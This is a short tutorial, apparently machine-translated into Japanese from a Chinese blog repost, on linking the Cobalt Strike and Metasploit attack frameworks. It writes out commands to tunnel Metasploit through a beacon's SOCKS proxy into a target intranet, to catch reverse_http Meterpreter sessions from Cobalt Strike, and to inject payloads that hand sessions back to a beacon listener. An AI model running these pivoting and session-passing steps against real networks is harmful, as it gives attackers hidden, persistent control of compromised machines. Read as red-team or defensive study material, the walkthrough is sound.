CobaltStrikeとMetasploitの連携方法

CobaltStrikeとMetasploitの連携

CobaltStrike (略称 CS) と MetaSploit (略称 MSF) にはそれぞれ長所があり、CS は安定性制御プラットフォームとしてより適しており、MSF はさまざまな種類のイントラネット情報収集や脆弱性悪用に適しています。お互いに学び合うために、連携を行うことができます。

方法 1

ローカル MSF をターゲット イントラネットに導入し、CS 組み込み Socks プロキシを通じて操作を実行します。

アイデア: ビーコン シェルを使用してターゲット マシンとチーム サーバーの間にソックスを確立し、プロキシチェーンなどのツールをローカルで使用してターゲット イントラネットに接続します。

CS スタート Socks プロキシ

プロキシチェーンを使用したプロキシ

ローカルの kali は /etc/proxychains.conf ファイルを編集し、TeamServer サーバーの IP と Socks ポートを追加します。これにより、ターゲット イントラネット (タイプは Socks4) に直接接続できるようになります。

vim /etc/proxychains.conf

vim /etc/proxychains4.conf

# 写入如下内容:
socks4 vps ip 7001

MSF セット プロキシ

ローカル MSF のすべてのモジュールのトラフィックが CS の Socks4 プロキシを通過するようにします。

プロキシ情報 > トンネル > プロキシ設定コマンドの取得

MSF を開き、グローバル プロキシ設定コマンドを実行します。

msfconsole -q
msf6> setg Proxies socks4:vps ip:7001

ローカル MSF のすべてのモジュールのトラフィックは、CS の Socks プロキシを通過できます。

方法 2

CS 上で http 外部リスナー (Foreign HTTP) を作成する

MSFが監視を開始

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost (vps内部ip)
set lport 810
run -j

CS に戻り、セッションを右クリックして、[生成 (新しいセッション)] を選択します。

MSFが検針員をゲット

MetasploitとCobaltStrikeの連携

CSでリスナー(ビーコンHTTP)を開く

MSF はセッションを取得しました

MSF でペイロード インジェクション モジュールを実行する

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost xxxxx      
#cobaltstrike监听的ip
set lport xxxx
#cobaltstrike监听的端口
set session 1
#这里是获得的session的id
run

DisablePayloadHandler のデフォルトは false です。つまり、payload_inject モジュールが実行された後、新しいハンドラー リスナーがローカルに生成されます。実行されたペイロードは Cobaltstrike リスナーに接続するように設定されているため、ここでは true に設定して、生成されないようにする新しいハンドラー・リスナー・デバイス

msf セッションが cs ビーコンにオンラインで接続されています

おすすめ

転載: blog.csdn.net/weixin_44971640/article/details/128673994